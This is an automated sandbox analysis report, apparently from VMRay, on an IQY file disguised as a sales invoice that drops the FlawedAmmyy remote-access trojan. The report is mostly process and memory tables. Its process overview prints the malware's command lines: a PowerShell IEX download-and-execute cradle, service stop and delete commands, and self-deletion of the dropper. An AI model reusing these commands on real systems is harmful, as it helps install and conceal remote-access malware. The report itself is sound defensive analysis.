IQY File Downloads FlawedAmmyy RAT | Grouped Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Target: Windows 7 (SP1, 64-bit), MS Office 2016 (64-bit) | ms_office
Classification: Trojan, Dropper, Exploit, Downloader

ca0da220f7691059b3174b2de14bd41ddb96bf3f02a2824b2b8c103215c7403c (SHA256)

Sales invoice Z12_01 copy.iqy.iqy

Excel Document

Created at 2018-06-06 09:51:00

Notifications (2/2)

The overall sleep time of all monitored processes was truncated from "3 minutes, 21 seconds" to "2 seconds" to reveal dormant functionality.

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x82c Analysis Target Medium excel.exe "C:\Program Files\Microsoft Office\Office16\EXCEL.EXE" -
#2 0x998 Child Process Medium msosync.exe "C:\Program Files\Microsoft Office\Office16\MsoSync.exe" #1
#3 0x544 Child Process Medium msosync.exe "C:\Program Files\Microsoft Office\Office16\MsoSync.exe" #1
#4 0xb94 Child Process Medium cmd.exe CMD.EXE /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).downloadstring(\"\")) #1
#5 0x9e4 Child Process Medium powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).downloadstring(\"\")) #4
#6 0x814 Child Process Medium cmd_.exe "C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe" #5
#7 0x4b0 Created Scheduled Job High (Elevated) taskeng.exe taskeng.exe {7366205D-AB28-4705-9A68-ED75B1319F38} S-1-5-21-1335525288-214869617-2635229968-1000:EXB9WSP\qj4SUKboE:Interactive:Highest[1] #6
#8 0xbf0 Created Scheduled Job Medium taskeng.exe taskeng.exe {F0BF9717-EB8A-4C23-8803-85A71A393FD9} S-1-5-21-1335525288-214869617-2635229968-1000:EXB9WSP\qj4SUKboE:Interactive:LUA[1] #6
#10 0xb84 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /C net.exe stop ammyy #6
#11 0xb7c Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /C sc delete ammyy #6
#12 0xbac Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /C net.exe stop foundation #6
#13 0xbc0 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /C sc delete foundation #6
#14 0x8d8 Child Process Medium net.exe net.exe stop ammyy #10
#15 0x540 Child Process Medium net.exe net.exe stop foundation #12
#16 0xb0 Child Process Medium net1.exe C:\Windows\system32\net1 stop foundation #15
#17 0x938 Child Process Medium sc.exe sc delete foundation #13
#18 0x744 Child Process Medium net1.exe C:\Windows\system32\net1 stop ammyy #14
#19 0xb64 Child Process Medium sc.exe sc delete ammyy #11
#21 0xa40 Child Process Medium wsus.exe C:\ProgramData\Settings\wsus.exe #6
#22 0xa60 Child Process Medium cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe >> NUL #6
#23 0xa80 Child Process Medium cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe >> NUL #6

Behavior Information - Grouped by Category

Process #1: excel.exe
0 0
Information Value
ID #1
File Name c:\program files\microsoft office\office16\excel.exe
Command Line "C:\Program Files\Microsoft Office\Office16\EXCEL.EXE"
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:00:31, Reason: Analysis Target
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:02:07
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x82c
Parent PID 0x5d8 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 94C
0x 938
0x 950
0x 934
0x 738
0x 91C
0x 368
0x 71C
0x 728
0x 708
0x 70C
0x 7A8
0x 770
0x 7B4
0x 7B0
0x 74C
0x 754
0x 758
0x 75C
0x 760
0x 764
0x 76C
0x 724
0x 700
0x 720
0x 838
0x 834
0x 928
0x 92C
0x 930
0x 8FC
0x 8F8
0x 924
0x 908
0x 97C
0x 7A4
0x 7D8
0x 314
0x 374
0x 15C
0x 6E8
0x 9A0
0x 9A8
0x 0
0x AF4
0x B48
0x 5C8
0x 908
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00021fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000100000 0x00100000 0x00101fff Pagefile Backed Memory Readable True False False -
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory - True False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000150000 0x00150000 0x00151fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000160000 0x00160000 0x00166fff Pagefile Backed Memory Readable True False False -
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pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000190000 0x00190000 0x00191fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x001affff Private Memory Readable, Writable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b1fff Pagefile Backed Memory Readable True False False -
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private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory Readable, Writable True False False -
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private_0x00000000004d0000 0x004d0000 0x005cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005d0000 0x005d0000 0x00757fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000760000 0x00760000 0x008e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008f0000 0x008f0000 0x01ceffff Pagefile Backed Memory Readable True False False -
private_0x0000000001cf0000 0x01cf0000 0x01d2ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000001d30000 0x01d30000 0x01d34fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000001d40000 0x01d40000 0x01d40fff Pagefile Backed Memory Readable True False False -
private_0x0000000001d50000 0x01d50000 0x01e4ffff Private Memory Readable, Writable True False False -
private_0x0000000001e50000 0x01e50000 0x01ecffff Private Memory Readable, Writable True False False -
pagefile_0x0000000001ed0000 0x01ed0000 0x01ed0fff Pagefile Backed Memory Readable True False False -
private_0x0000000001ee0000 0x01ee0000 0x01ee0fff Private Memory Readable, Writable True False False -
private_0x0000000001ef0000 0x01ef0000 0x01feffff Private Memory Readable, Writable True False False -
private_0x0000000001ff0000 0x01ff0000 0x01ff0fff Private Memory Readable, Writable True False False -
private_0x0000000002000000 0x02000000 0x02000fff Private Memory Readable, Writable True False False -
private_0x0000000002010000 0x02010000 0x02010fff Private Memory Readable, Writable True False False -
private_0x0000000002020000 0x02020000 0x02020fff Private Memory Readable, Writable True False False -
private_0x0000000002030000 0x02030000 0x0212ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002130000 0x02130000 0x02522fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02530000 0x027fefff Memory Mapped File Readable False False False -
xlintl32.dll 0x02800000 0x03841fff Memory Mapped File Readable False False False -
private_0x0000000003850000 0x03850000 0x03850fff Private Memory Readable, Writable True False False -
pagefile_0x0000000003860000 0x03860000 0x03861fff Pagefile Backed Memory Readable True False False -
private_0x0000000003870000 0x03870000 0x03871fff Private Memory Readable, Writable True False False -
pagefile_0x0000000003880000 0x03880000 0x03881fff Pagefile Backed Memory Readable True False False -
private_0x0000000003890000 0x03890000 0x0389ffff Private Memory Readable, Writable True False False -
private_0x00000000038a0000 0x038a0000 0x038b1fff Private Memory Readable, Writable True False False -
pagefile_0x00000000038c0000 0x038c0000 0x038c0fff Pagefile Backed Memory Readable True False False -
private_0x00000000038d0000 0x038d0000 0x038d0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000038e0000 0x038e0000 0x038e1fff Pagefile Backed Memory Readable True False False -
private_0x00000000038f0000 0x038f0000 0x038f0fff Private Memory Readable, Writable True False False -
pagefile_0x0000000003900000 0x03900000 0x03901fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000003910000 0x03910000 0x03911fff Pagefile Backed Memory Readable True False False -
private_0x0000000003920000 0x03920000 0x03a1ffff Private Memory Readable, Writable True False False -
private_0x0000000003a20000 0x03a20000 0x03a31fff Private Memory Readable, Writable True False False -
comdlg32.dll.mui 0x03a40000 0x03a4cfff Memory Mapped File Readable, Writable False False False -
pagefile_0x0000000003a50000 0x03a50000 0x03a51fff Pagefile Backed Memory Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x03a60000 0x03a7ffff Memory Mapped File Readable True False False -
pagefile_0x0000000003a80000 0x03a80000 0x03a80fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000003a90000 0x03a90000 0x03b8ffff Private Memory Readable, Writable True False False -
private_0x0000000003b90000 0x03b90000 0x03c8ffff Private Memory Readable, Writable True False False -
private_0x0000000003c90000 0x03c90000 0x03d8ffff Private Memory Readable, Writable True False False -
c_1255.nls 0x03d90000 0x03da0fff Memory Mapped File Readable False False False -
cversions.2.db 0x03db0000 0x03db3fff Memory Mapped File Readable True False False -
private_0x0000000003dc0000 0x03dc0000 0x03ebffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003ec0000 0x03ec0000 0x042bffff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000042c0000 0x042c0000 0x042c1fff Pagefile Backed Memory Readable True False False -
private_0x00000000042d0000 0x042d0000 0x0434ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000004350000 0x04350000 0x04350fff Private Memory Readable, Writable True False False -
private_0x0000000004360000 0x04360000 0x04360fff Private Memory Readable, Writable True False False -
private_0x0000000004370000 0x04370000 0x0446ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004470000 0x04470000 0x04c6ffff Pagefile Backed Memory Readable, Writable True False False -
segoeui.ttf 0x04c70000 0x04ceefff Memory Mapped File Readable False False False -
private_0x0000000004cf0000 0x04cf0000 0x04cf0fff Private Memory Readable, Writable True False False -
private_0x0000000004d00000 0x04d00000 0x04d7ffff Private Memory Readable, Writable True False False -
segoeuil.ttf 0x04d80000 0x04dd0fff Memory Mapped File Readable False False False -
private_0x0000000004de0000 0x04de0000 0x04deffff Private Memory Readable, Writable True False False -
private_0x0000000004df0000 0x04df0000 0x04eeffff Private Memory Readable, Writable True False False -
private_0x0000000004ef0000 0x04ef0000 0x04ef0fff Private Memory Readable, Writable True False False -
private_0x0000000004f00000 0x04f00000 0x04ffffff Private Memory Readable, Writable True False False -
private_0x0000000005000000 0x05000000 0x050fffff Private Memory Readable, Writable True False False -
private_0x0000000005100000 0x05100000 0x05100fff Private Memory Readable, Writable True False False -
private_0x0000000005110000 0x05110000 0x0520ffff Private Memory Readable, Writable True False False -
private_0x0000000005210000 0x05210000 0x0540ffff Private Memory Readable, Writable True False False -
private_0x0000000005410000 0x05410000 0x05410fff Private Memory Readable, Writable True False False -
private_0x0000000005420000 0x05420000 0x05422fff Private Memory Readable, Writable True False False -
private_0x0000000005430000 0x05430000 0x05432fff Private Memory Readable, Writable True False False -
private_0x0000000005440000 0x05440000 0x05442fff Private Memory Readable, Writable True False False -
private_0x0000000005450000 0x05450000 0x05452fff Private Memory Readable, Writable True False False -
private_0x0000000005460000 0x05460000 0x0546ffff Private Memory Readable, Writable True False False -
private_0x0000000005470000 0x05470000 0x05470fff Private Memory Readable, Writable True False False -
private_0x0000000005480000 0x05480000 0x05480fff Private Memory Readable, Writable True False False -
private_0x0000000005490000 0x05490000 0x054d7fff Private Memory Readable, Writable True False False -
private_0x00000000054e0000 0x054e0000 0x05527fff Private Memory Readable, Writable True False False -
private_0x0000000005530000 0x05530000 0x05531fff Private Memory Readable, Writable True False False -
private_0x0000000005540000 0x05540000 0x05540fff Private Memory Readable, Writable True False False -
private_0x0000000005550000 0x05550000 0x05550fff Private Memory Readable, Writable True False False -
private_0x0000000005560000 0x05560000 0x0565ffff Private Memory Readable, Writable True False False -
staticcache.dat 0x05660000 0x05f8ffff Memory Mapped File Readable False False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000d.db 0x05f90000 0x05fbffff Memory Mapped File Readable True False False -
cversions.2.db 0x05fc0000 0x05fc3fff Memory Mapped File Readable True False False -
pagefile_0x0000000005fd0000 0x05fd0000 0x05fd1fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000005fe0000 0x05fe0000 0x05fe1fff Pagefile Backed Memory Readable True False False -
private_0x0000000005ff0000 0x05ff0000 0x05ff0fff Private Memory Readable, Writable True False False -
private_0x0000000006000000 0x06000000 0x06000fff Private Memory Readable, Writable True False False -
private_0x0000000006010000 0x06010000 0x06010fff Private Memory Readable, Writable True False False -
private_0x0000000006020000 0x06020000 0x06020fff Private Memory Readable, Writable True False False -
private_0x0000000006030000 0x06030000 0x0612ffff Private Memory Readable, Writable True False False -
private_0x0000000006130000 0x06130000 0x0652ffff Private Memory Readable, Writable True False False -
private_0x0000000006530000 0x06530000 0x06530fff Private Memory Readable, Writable True False False -
private_0x0000000006540000 0x06540000 0x06540fff Private Memory Readable, Writable True False False -
private_0x0000000006550000 0x06550000 0x06550fff Private Memory Readable, Writable True False False -
private_0x0000000006560000 0x06560000 0x06560fff Private Memory Readable, Writable True False False -
private_0x0000000006570000 0x06570000 0x0666ffff Private Memory Readable, Writable True False False -
private_0x0000000006670000 0x06670000 0x06670fff Private Memory Readable, Writable True False False -
private_0x0000000006680000 0x06680000 0x06680fff Private Memory Readable, Writable True False False -
private_0x0000000006690000 0x06690000 0x0669ffff Private Memory Readable, Writable True False False -
private_0x00000000066a0000 0x066a0000 0x06e9ffff Private Memory Readable, Writable True False False -
private_0x0000000006ea0000 0x06ea0000 0x072a0fff Private Memory Readable, Writable True False False -
private_0x00000000072b0000 0x072b0000 0x076b0fff Private Memory Readable, Writable True False False -
private_0x00000000076c0000 0x076c0000 0x07ac0fff Private Memory Readable, Writable True False False -
private_0x0000000007ad0000 0x07ad0000 0x07ccffff Private Memory Readable, Writable True False False -
private_0x0000000007cd0000 0x07cd0000 0x0818ffff Private Memory Readable, Writable True False False -
private_0x0000000008190000 0x08190000 0x0858ffff Private Memory Readable, Writable True False False -
private_0x0000000008590000 0x08590000 0x08590fff Private Memory Readable, Writable True False False -
private_0x00000000085a0000 0x085a0000 0x085a0fff Private Memory Readable, Writable True False False -
private_0x00000000085b0000 0x085b0000 0x086affff Private Memory Readable, Writable True False False -
tahoma.ttf 0x086b0000 0x0875afff Memory Mapped File Readable False False False -
private_0x0000000008760000 0x08760000 0x08760fff Private Memory Readable, Writable True False False -
private_0x0000000008770000 0x08770000 0x0886ffff Private Memory Readable, Writable True False False -
office.odf 0x08870000 0x08a28fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000008a30000 0x08a30000 0x08b2ffff Private Memory Readable, Writable True False False -
private_0x0000000008b30000 0x08b30000 0x08baffff Private Memory Readable, Writable True False False -
private_0x0000000008bb0000 0x08bb0000 0x08bb0fff Private Memory Readable, Writable True False False -
pagefile_0x0000000008bc0000 0x08bc0000 0x08bc0fff Pagefile Backed Memory Readable True False False -
private_0x0000000008bd0000 0x08bd0000 0x08bd0fff Private Memory Readable, Writable True False False -
private_0x0000000008be0000 0x08be0000 0x08beffff Private Memory Readable, Writable True False False -
private_0x0000000008bf0000 0x08bf0000 0x08ceffff Private Memory Readable, Writable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x08cf0000 0x08d55fff Memory Mapped File Readable True False False -
private_0x0000000008d60000 0x08d60000 0x08d60fff Private Memory Readable, Writable True False False -
cversions.2.db 0x08d70000 0x08d73fff Memory Mapped File Readable True False False -
private_0x0000000008d80000 0x08d80000 0x08e7ffff Private Memory Readable, Writable True False False -
{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db 0x08e80000 0x08e80fff Memory Mapped File Readable True False False -
cversions.2.db 0x08e90000 0x08e93fff Memory Mapped File Readable True False False -
For performance reasons, the remaining 336 entries are omitted.
The remaining entries can be found in flog.txt.
Process #2: msosync.exe
0 0
Information Value
ID #2
File Name c:\program files\microsoft office\office16\msosync.exe
Command Line "C:\Program Files\Microsoft Office\Office16\MsoSync.exe"
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:00:42, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:56
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x998
Parent PID 0x82c (c:\program files\microsoft office\office16\excel.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 140
0x 9C0
0x 9BC
0x 57C
0x 578
0x 590
0x 714
0x 9F8
0x 9DC
0x A20
0x A34
0x A44
0x A54
0x A64
0x A74
0x A84
0x 774
0x A94
0x AD4
0x AE4
0x 4A8
0x 6BC
0x 0
0x 7A4
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00040000 0x000a6fff Memory Mapped File Readable False False False -
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable True False False -
private_0x00000000000f0000 0x000f0000 0x000fffff Private Memory - True False False -
pagefile_0x0000000000100000 0x00100000 0x00101fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000110000 0x00110000 0x00111fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000140000 0x00140000 0x00146fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000150000 0x00150000 0x00151fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000160000 0x00160000 0x00161fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x0018ffff Private Memory Readable, Writable True False False -
private_0x0000000000190000 0x00190000 0x00190fff Private Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x0029ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000002a0000 0x002a0000 0x0037efff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000380000 0x00380000 0x00384fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000390000 0x00390000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x0000000000490000 0x00490000 0x0058ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000590000 0x00590000 0x00717fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000720000 0x00720000 0x008a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008b0000 0x008b0000 0x01caffff Pagefile Backed Memory Readable True False False -
private_0x0000000001cb0000 0x01cb0000 0x01cbffff Private Memory Readable, Writable True False False -
c_1255.nls 0x01cc0000 0x01cd0fff Memory Mapped File Readable False False False -
private_0x0000000001d50000 0x01d50000 0x01d5ffff Private Memory Readable, Writable True False False -
private_0x0000000001d60000 0x01d60000 0x01ddffff Private Memory Readable, Writable True False False -
private_0x0000000001de0000 0x01de0000 0x01e5ffff Private Memory Readable, Writable True False False -
private_0x0000000001e90000 0x01e90000 0x01e9ffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x01f9ffff Private Memory Readable, Writable True False False -
private_0x0000000001fd0000 0x01fd0000 0x020cffff Private Memory Readable, Writable True False False -
private_0x00000000021c0000 0x021c0000 0x022bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000022c0000 0x022c0000 0x026b2fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x026c0000 0x0298efff Memory Mapped File Readable False False False -
pagefile_0x0000000002990000 0x02990000 0x02d8ffff Pagefile Backed Memory Readable True False False -
private_0x0000000002e30000 0x02e30000 0x02f2ffff Private Memory Readable, Writable True False False -
private_0x0000000003020000 0x03020000 0x0311ffff Private Memory Readable, Writable True False False -
private_0x00000000031e0000 0x031e0000 0x032dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000032e0000 0x032e0000 0x03adffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000003bc0000 0x03bc0000 0x03cbffff Private Memory Readable, Writable True False False -
staticcache.dat 0x03cc0000 0x045effff Memory Mapped File Readable False False False -
private_0x00000000371e0000 0x371e0000 0x371effff Private Memory Readable, Writable, Executable True False False -
sfc.dll 0x73da0000 0x73da2fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771d0000 0x772c9fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x772d0000 0x773eefff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x775c0000 0x775c6fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
msosync.exe 0x13f8a0000 0x13f918fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000007febd860000 0x7febd860000 0x7febd86ffff Private Memory Readable, Writable, Executable True False False -
msptls.dll 0x7fee6e90000 0x7fee6ffffff Memory Mapped File Readable, Writable, Executable False False False -
csi.dll 0x7fee7490000 0x7fee7b8dfff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x7fee81b0000 0x7fee824ffff Memory Mapped File Readable, Writable, Executable False False False -
riched20.dll 0x7fee8d50000 0x7fee8f72fff Memory Mapped File Readable, Writable, Executable False False False -
dwrite.dll 0x7fee9020000 0x7fee919dfff Memory Mapped File Readable, Writable, Executable False False False -
msointl.dll 0x7fee91a0000 0x7fee931afff Memory Mapped File Readable, Writable, Executable False False False -
d3d10warp.dll 0x7fee9320000 0x7fee94effff Memory Mapped File Readable, Writable, Executable False False False -
msores.dll 0x7fee94f0000 0x7feee32efff Memory Mapped File Readable, Writable, Executable False False False -
mso99lres.dll 0x7feee330000 0x7feeec50fff Memory Mapped File Readable, Writable, Executable False False False -
mso40uires.dll 0x7feeec60000 0x7feeef67fff Memory Mapped File Readable, Writable, Executable False False False -
mso.dll 0x7feeef70000 0x7fef024bfff Memory Mapped File Readable, Writable, Executable False False False -
mso99lwin32client.dll 0x7fef0250000 0x7fef0a1bfff Memory Mapped File Readable, Writable, Executable False False False -
mso40uiwin32client.dll 0x7fef0a20000 0x7fef130afff Memory Mapped File Readable, Writable, Executable False False False -
mso30win32client.dll 0x7fef1310000 0x7fef1787fff Memory Mapped File Readable, Writable, Executable False False False -
d3d11.dll 0x7fef2ac0000 0x7fef2b85fff Memory Mapped File Readable, Writable, Executable False False False -
mso20win32client.dll 0x7fef2b90000 0x7fef2e93fff Memory Mapped File Readable, Writable, Executable False False False -
d2d1.dll 0x7fef2fd0000 0x7fef30b1fff Memory Mapped File Readable, Writable, Executable False False False -
ospintl.dll 0x7fef7850000 0x7fef7854fff Memory Mapped File Readable, Writable, Executable False False False -
sppc.dll 0x7fef7ac0000 0x7fef7ae6fff Memory Mapped File Readable, Writable, Executable False False False -
office.odf 0x7fef8450000 0x7fef8608fff Memory Mapped File Readable, Writable, Executable False False False -
msi.dll 0x7fef8610000 0x7fef8925fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp140.dll 0x7fef8930000 0x7fef89cbfff Memory Mapped File Readable, Writable, Executable False False False -
gdiplus.dll 0x7fef8eb0000 0x7fef90c4fff Memory Mapped File Readable, Writable, Executable False False False -
msointl30.dll 0x7fef90d0000 0x7fef90defff Memory Mapped File Readable, Writable, Executable False False False -
msimg32.dll 0x7fef90e0000 0x7fef90e6fff Memory Mapped File Readable, Writable, Executable False False False -
sfc_os.dll 0x7fefa160000 0x7fefa16ffff Memory Mapped File Readable, Writable, Executable False False False -
davhlpr.dll 0x7fefa8d0000 0x7fefa8d9fff Memory Mapped File Readable, Writable, Executable False False False -
davclnt.dll 0x7fefa8e0000 0x7fefa8fbfff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-utility-l1-1-0.dll 0x7fefa980000 0x7fefa982fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-environment-l1-1-0.dll 0x7fefa990000 0x7fefa992fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-filesystem-l1-1-0.dll 0x7fefa9a0000 0x7fefa9a2fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-time-l1-1-0.dll 0x7fefa9b0000 0x7fefa9b2fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-multibyte-l1-1-0.dll 0x7fefa9c0000 0x7fefa9c4fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-math-l1-1-0.dll 0x7fefa9d0000 0x7fefa9d4fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-locale-l1-1-0.dll 0x7fefabe0000 0x7fefabe2fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-convert-l1-1-0.dll 0x7fefabf0000 0x7fefabf3fff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x7fefaee0000 0x7fefaeeafff Memory Mapped File Readable, Writable, Executable False False False -
peerdist.dll 0x7fefb1d0000 0x7fefb1fffff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-stdio-l1-1-0.dll 0x7fefb320000 0x7fefb323fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-heap-l1-1-0.dll 0x7fefb330000 0x7fefb332fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-string-l1-1-0.dll 0x7fefb340000 0x7fefb343fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x7fefb350000 0x7fefb441fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-file-l1-2-0.dll 0x7fefb4c0000 0x7fefb4c2fff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x7fefb5d0000 0x7fefb5e0fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-processthreads-l1-1-1.dll 0x7fefb5f0000 0x7fefb5f2fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7fefb770000 0x7fefb787fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7fefbb50000 0x7fefbba5fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-synch-l1-2-0.dll 0x7fefbbd0000 0x7fefbbd2fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-localization-l1-2-0.dll 0x7fefbbe0000 0x7fefbbe2fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-file-l2-1-0.dll 0x7fefbbf0000 0x7fefbbf2fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x7fefbc00000 0x7fefbdf3fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-timezone-l1-1-0.dll 0x7fefbe00000 0x7fefbe02fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-runtime-l1-1-0.dll 0x7fefbe10000 0x7fefbe13fff Memory Mapped File Readable, Writable, Executable False False False -
vcruntime140.dll 0x7fefbe20000 0x7fefbe35fff Memory Mapped File Readable, Writable, Executable False False False -
dxgi.dll 0x7fefbe40000 0x7fefbee6fff Memory Mapped File Readable, Writable, Executable False False False -
d3d10_1core.dll 0x7fefbef0000 0x7fefbf44fff Memory Mapped File Readable, Writable, Executable False False False -
d3d10_1.dll 0x7fefbf50000 0x7fefbf83fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x7fefc100000 0x7fefc22bfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7fefc500000 0x7fefc50bfff Memory Mapped File Readable, Writable, Executable False False False -
